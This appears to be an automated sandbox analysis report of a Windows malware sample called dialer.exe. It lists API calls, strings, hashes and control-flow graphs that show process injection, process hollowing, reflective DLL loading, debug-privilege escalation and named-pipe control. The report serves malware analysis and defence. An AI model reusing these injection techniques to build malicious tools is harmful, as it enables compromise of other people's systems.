                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: File$Write$CloseCreateHandle
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 148219782-3440882674
                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: ntdll.dll
                        • API String ID: 1646373207-2227199552
                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                        Execution Graph

                        Execution Coverage:18.4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:214
                        Total number of Limit Nodes:5
                        execution_graph 436 140002524 437 140002531 436->437 438 140002539 436->438 440 1400010c0 437->440 478 1400018ac OpenProcess 440->478 443 1400014ba 443->438 444 140001122 OpenProcess 444->443 445 14000113e OpenProcess 444->445 446 140001161 K32GetModuleFileNameExW 445->446 447 1400011fd NtQueryInformationProcess 445->447 448 1400011aa CloseHandle 446->448 449 14000117a PathFindFileNameW lstrlenW 446->449 450 1400014b1 CloseHandle 447->450 451 140001224 447->451 448->447 453 1400011b8 448->453 449->448 452 140001197 StrCpyW 449->452 450->443 451->450 454 140001230 OpenProcessToken 451->454 452->448 453->447 456 1400011d8 StrCmpIW 453->456 454->450 455 14000124e GetTokenInformation 454->455 457 1400012f1 455->457 458 140001276 GetLastError 455->458 456->450 456->453 460 1400012f8 CloseHandle 457->460 458->457 459 140001281 LocalAlloc 458->459 459->457 461 140001297 GetTokenInformation 459->461 460->450 465 14000130c 460->465 462 1400012df 461->462 463 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 461->463 464 1400012e6 LocalFree 462->464 463->464 464->460 465->450 466 14000139b StrStrA 465->466 467 1400013c3 465->467 466->465 468 1400013c8 466->468 467->450 468->450 469 1400013f3 VirtualAllocEx 468->469 469->450 470 140001420 WriteProcessMemory 469->470 470->450 471 14000143b 470->471 483 14000211c 471->483 479 14000110e 478->479 480 1400018d8 IsWow64Process 478->480 479->443 479->444 481 1400018f8 CloseHandle 480->481 482 1400018ea 480->482 481->479 482->481 486 140001914 GetModuleHandleA 483->486 487 140001934 GetProcAddress 486->487 488 14000193d 486->488 487->488 382 140002258 385 14000226c 382->385 409 140001f2c 385->409 388 140001f2c 14 API calls 389 14000228f GetCurrentProcessId OpenProcess 388->389 390 140002321 FindResourceExA 389->390 391 1400022af OpenProcessToken 389->391 394 140002341 SizeofResource 390->394 395 140002261 ExitProcess 390->395 392 1400022c3 LookupPrivilegeValueW 391->392 393 140002318 CloseHandle 391->393 392->393 396 1400022da AdjustTokenPrivileges 392->396 393->390 394->395 397 14000235a LoadResource 394->397 396->393 398 140002312 GetLastError 396->398 397->395 399 14000236e LockResource GetCurrentProcessId 397->399 398->393 423 1400017ec GetProcessHeap HeapAlloc 399->423 410 140001f35 StrCpyW StrCatW GetModuleHandleW 409->410 411 1400020ff 409->411 410->411 412 140001f86 GetCurrentProcess K32GetModuleInformation 410->412 411->388 413 1400020f6 FreeLibrary 412->413 414 140001fb6 CreateFileW 412->414 413->411 414->413 415 140001feb CreateFileMappingW 414->415 416 140002014 MapViewOfFile 415->416 417 1400020ed CloseHandle 415->417 418 1400020e4 CloseHandle 416->418 419 140002037 416->419 417->413 418->417 419->418 420 140002050 lstrcmpiA 419->420 422 14000208e 419->422 420->419 421 140002090 VirtualProtect VirtualProtect 420->421 421->418 422->418 429 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 423->429 425 140001885 GetProcessHeap HeapFree 426 140001830 426->425 427 140001851 OpenProcess 426->427 427->426 428 140001867 TerminateProcess CloseHandle 427->428 428->426 430 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 429->430 433 140001565 429->433 430->426 431 14000157a OpenProcess 432 140001597 K32EnumProcessModules 431->432 431->433 432->433 434 14000161a CloseHandle 432->434 433->430 433->431 433->434 435 1400015c9 ReadProcessMemory 433->435 434->433 435->433 489 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 490 140002b8e K32EnumProcesses 489->490 491 140002beb Sleep 490->491 492 140002ba3 490->492 491->490 492->491 493 140002bf8 494 140002c05 493->494 496 140002c25 ConnectNamedPipe 494->496 497 140002c1a Sleep 494->497 503 140001b54 AllocateAndInitializeSid 494->503 498 140002c83 Sleep 496->498 499 140002c34 ReadFile 496->499 497->494 501 140002c8e DisconnectNamedPipe 498->501 500 140002c57 WriteFile 499->500 499->501 500->501 501->496 504 140001bb1 SetEntriesInAclW 503->504 505 140001c6f 503->505 504->505 506 140001bf5 LocalAlloc 504->506 505->494 506->505 507 140001c09 InitializeSecurityDescriptor 506->507 507->505 508 140001c19 SetSecurityDescriptorDacl 507->508 508->505 509 140001c30 CreateNamedPipeW 508->509 509->505 510 140002540 511 140002558 510->511 512 14000254d 510->512 513 1400010c0 30 API calls 512->513 513->511 514 1400021d0 515 1400021dd 514->515 516 140001b54 6 API calls 515->516 517 1400021f2 Sleep 515->517 518 1400021fd ConnectNamedPipe 515->518 516->515 517->515 519 140002241 Sleep 518->519 520 14000220c ReadFile 518->520 521 14000224c DisconnectNamedPipe 519->521 520->521 522 14000222f 520->522 521->518 522->521 523 140002560 524 140002592 523->524 525 14000273a 523->525 526 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 524->526 527 140002598 524->527 528 140002748 525->528 529 14000297e ReadFile 525->529 530 140002633 526->530 532 140002704 526->532 533 1400025a5 527->533 534 1400026bd ExitProcess 527->534 535 140002751 528->535 536 140002974 528->536 529->530 531 1400029a8 529->531 531->530 544 1400018ac 3 API calls 531->544 532->530 546 1400010c0 30 API calls 532->546 540 1400025ae 533->540 541 140002660 RegOpenKeyExW 533->541 537 140002919 535->537 538 14000275c 535->538 539 14000175c 22 API calls 536->539 545 140001944 ReadFile 537->545 542 140002761 538->542 543 14000279d 538->543 539->530 540->530 556 1400025cb ReadFile 540->556 547 1400026a1 541->547 548 14000268d RegDeleteValueW 541->548 542->530 605 14000217c 542->605 608 140001944 543->608 549 1400029c7 544->549 551 140002928 545->551 546->532 592 1400019c4 SysAllocString SysAllocString CoInitializeEx 547->592 548->547 549->530 560 1400029db GetProcessHeap HeapAlloc 549->560 561 140002638 549->561 551->530 563 140001944 ReadFile 551->563 555 1400026a6 600 14000175c GetProcessHeap HeapAlloc 555->600 556->530 558 1400025f5 556->558 558->530 570 1400018ac 3 API calls 558->570 566 1400014d8 13 API calls 560->566 572 140002a90 4 API calls 561->572 562 1400027b4 ReadFile 562->530 567 1400027dc 562->567 568 14000293f 563->568 583 140002a14 566->583 567->530 573 1400027e9 GetProcessHeap HeapAlloc ReadFile 567->573 568->530 574 140002947 ShellExecuteW 568->574 576 140002614 570->576 572->530 578 14000290b GetProcessHeap 573->578 579 14000282d 573->579 574->530 576->530 576->561 582 140002624 576->582 577 140002a49 GetProcessHeap 580 140002a52 HeapFree 577->580 578->580 579->578 584 140002881 lstrlenW GetProcessHeap HeapAlloc 579->584 585 14000285e 579->585 580->530 586 1400010c0 30 API calls 582->586 583->577 632 1400016cc 583->632 626 140002a90 CreateFileW 584->626 585->578 612 140001c88 585->612 586->530 593 140001a11 CoInitializeSecurity 592->593 594 140001b2c SysFreeString SysFreeString 592->594 595 140001a59 CoCreateInstance 593->595 596 140001a4d 593->596 594->555 597 140001b26 CoUninitialize 595->597 598 140001a88 VariantInit 595->598 596->595 596->597 597->594 599 140001ade 598->599 599->597 601 1400014d8 13 API calls 600->601 603 14000179a 601->603 602 1400017c8 GetProcessHeap HeapFree 603->602 604 1400016cc 5 API calls 603->604 604->603 606 140001914 2 API calls 605->606 607 140002191 606->607 609 140001968 ReadFile 608->609 610 14000198b 609->610 611 1400019a5 609->611 610->609 610->611 611->530 611->562 618 140001cbb 612->618 613 140001cce CreateProcessW 614 140001d2b VirtualAllocEx 613->614 613->618 616 140001d60 WriteProcessMemory 614->616 614->618 615 140001e97 615->578 616->618 617 140001e62 OpenProcess 617->618 619 140001e78 TerminateProcess 617->619 618->613 618->615 618->617 620 140001dd2 VirtualAlloc 618->620 622 140001d8c WriteProcessMemory 618->622 619->618 620->618 621 140001df1 GetThreadContext 620->621 621->618 623 140001e09 WriteProcessMemory 621->623 622->618 623->618 624 140001e30 SetThreadContext 623->624 624->618 625 140001e4e ResumeThread 624->625 625->615 625->618 627 1400028f7 GetProcessHeap HeapFree 626->627 628 140002ada WriteFile 626->628 627->578 629 140002b1c CloseHandle 628->629 630 140002afe 628->630 629->627 630->629 631 140002b02 WriteFile 630->631 631->629 633 140001745 632->633 634 1400016eb OpenProcess 632->634 633->577 634->633 635 140001703 634->635 636 14000211c 2 API calls 635->636 637 140001723 636->637 638 14000173c CloseHandle 637->638 639 140001731 CloseHandle 637->639 638->633 639->638

                        Callgraph

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                        • API String ID: 4177739653-1130149537
                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                        • String ID:
                        • API String ID: 4084875642-0
                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                        • String ID: .text$C:\Windows\System32\
                        • API String ID: 2721474350-832442975
                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                        Control-flow Graph

                        APIs
                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                          • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                        • OpenProcess.KERNEL32 ref: 0000000140001859
                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                        • CloseHandle.KERNEL32 ref: 0000000140001875
                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                        • String ID:
                        • API String ID: 1323846700-0
                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 67 140002258-14000225c call 14000226c 69 140002261-140002263 ExitProcess 67->69
                        APIs
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                          • Part of subcall function 000000014000226C: RegCreateKeyExW.ADVAPI32 ref: 00000001400023BE
                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                          • Part of subcall function 000000014000226C: RegSetKeySecurity.ADVAPI32 ref: 00000001400023FE
                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                        • ExitProcess.KERNEL32 ref: 0000000140002263
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                        • String ID:
                        • API String ID: 3836936051-0
                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 70 1400010c0-140001110 call 1400018ac 73 140001116-14000111c 70->73 74 1400014ba-1400014d6 70->74 73->74 75 140001122-140001138 OpenProcess 73->75 75->74 76 14000113e-14000115b OpenProcess 75->76 77 140001161-140001178 K32GetModuleFileNameExW 76->77 78 1400011fd-14000121e NtQueryInformationProcess 76->78 79 1400011aa-1400011b6 CloseHandle 77->79 80 14000117a-140001195 PathFindFileNameW lstrlenW 77->80 81 1400014b1-1400014b4 CloseHandle 78->81 82 140001224-14000122a 78->82 79->78 84 1400011b8-1400011d3 79->84 80->79 83 140001197-1400011a7 StrCpyW 80->83 81->74 82->81 85 140001230-140001248 OpenProcessToken 82->85 83->79 87 1400011d8-1400011ea StrCmpIW 84->87 85->81 86 14000124e-140001274 GetTokenInformation 85->86 88 1400012f1 86->88 89 140001276-14000127f GetLastError 86->89 87->81 90 1400011f0-1400011fb 87->90 92 1400012f8-140001306 CloseHandle 88->92 89->88 91 140001281-140001295 LocalAlloc 89->91 90->78 90->87 91->88 93 140001297-1400012bd GetTokenInformation 91->93 92->81 94 14000130c-140001313 92->94 95 1400012df 93->95 96 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 93->96 94->81 97 140001319-140001324 94->97 98 1400012e6-1400012ef LocalFree 95->98 96->98 97->81 99 14000132a-140001334 97->99 98->92 99->81 100 14000133a-140001344 99->100 100->81 101 14000134a-14000138a call 140001ec4 * 3 100->101 101->81 108 140001390-1400013b0 call 140001ec4 StrStrA 101->108 111 1400013b2-1400013c1 108->111 112 1400013c8-1400013ed call 140001ec4 * 2 108->112 111->108 113 1400013c3 111->113 112->81 118 1400013f3-14000141a VirtualAllocEx 112->118 113->81 118->81 119 140001420-140001439 WriteProcessMemory 118->119 119->81 120 14000143b-14000145d call 14000211c 119->120 120->81 123 14000145f-140001467 120->123 123->81 124 140001469-14000146f 123->124 125 140001471-140001476 124->125 126 140001478-140001485 WaitForSingleObject 124->126 127 1400014ab CloseHandle 125->127 128 1400014a6 126->128 129 140001487-14000149b GetExitCodeThread 126->129 127->81 128->127 129->128 130 14000149d-1400014a3 129->130 130->128
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                        • API String ID: 2561231171-3753927220
                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 131 140002560-14000258c 132 140002592 131->132 133 14000273a-140002742 131->133 134 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 132->134 135 140002598-14000259f 132->135 136 140002748-14000274b 133->136 137 14000297e-1400029a2 ReadFile 133->137 138 140002a74-140002a8e 134->138 140 140002704-140002715 134->140 141 1400025a5-1400025a8 135->141 142 1400026bd-1400026bf ExitProcess 135->142 143 140002751-140002756 136->143 144 140002974-140002979 call 14000175c 136->144 137->138 139 1400029a8-1400029af 137->139 139->138 148 1400029b5-1400029c9 call 1400018ac 139->148 140->138 149 14000271b-140002733 call 1400010c0 140->149 150 1400025ae-1400025b1 141->150 151 140002660-14000268b RegOpenKeyExW 141->151 145 140002919-14000292c call 140001944 143->145 146 14000275c-14000275f 143->146 144->138 145->138 173 140002932-140002941 call 140001944 145->173 152 140002761-140002766 146->152 153 14000279d-1400027ae call 140001944 146->153 148->138 171 1400029cf-1400029d5 148->171 174 140002735 149->174 160 140002651-14000265b 150->160 161 1400025b7-1400025ba 150->161 158 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 151->158 159 14000268d-14000269b RegDeleteValueW 151->159 152->138 162 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 152->162 153->138 182 1400027b4-1400027d6 ReadFile 153->182 158->138 159->158 160->138 168 140002644-14000264c 161->168 169 1400025c0-1400025c5 161->169 168->138 169->138 176 1400025cb-1400025ef ReadFile 169->176 180 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 171->180 181 140002a5f 171->181 173->138 197 140002947-14000296f ShellExecuteW 173->197 174->138 176->138 178 1400025f5-1400025fc 176->178 178->138 185 140002602-140002616 call 1400018ac 178->185 200 140002a18-140002a1e 180->200 201 140002a49-140002a4f GetProcessHeap 180->201 187 140002a66-140002a6f call 140002a90 181->187 182->138 189 1400027dc-1400027e3 182->189 185->138 206 14000261c-140002622 185->206 187->138 189->138 196 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 189->196 202 14000290b-140002914 GetProcessHeap 196->202 203 14000282d-140002839 196->203 197->138 200->201 207 140002a20-140002a32 200->207 204 140002a52-140002a5d HeapFree 201->204 202->204 203->202 208 14000283f-14000284b 203->208 204->138 210 140002624-140002633 call 1400010c0 206->210 211 140002638-14000263f 206->211 212 140002a34-140002a36 207->212 213 140002a38-140002a40 207->213 208->202 214 140002851-14000285c 208->214 210->138 211->187 212->213 218 140002a44 call 1400016cc 212->218 213->201 219 140002a42 213->219 215 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 214->215 216 14000285e-140002869 214->216 215->202 216->202 220 14000286f-14000287c call 140001c88 216->220 218->201 219->207 220->202
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                        • String ID: SOFTWARE$dialerstager$open
                        • API String ID: 3276259517-3931493855
                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                        Control-flow Graph

                        • Executed
                        • Not Executed
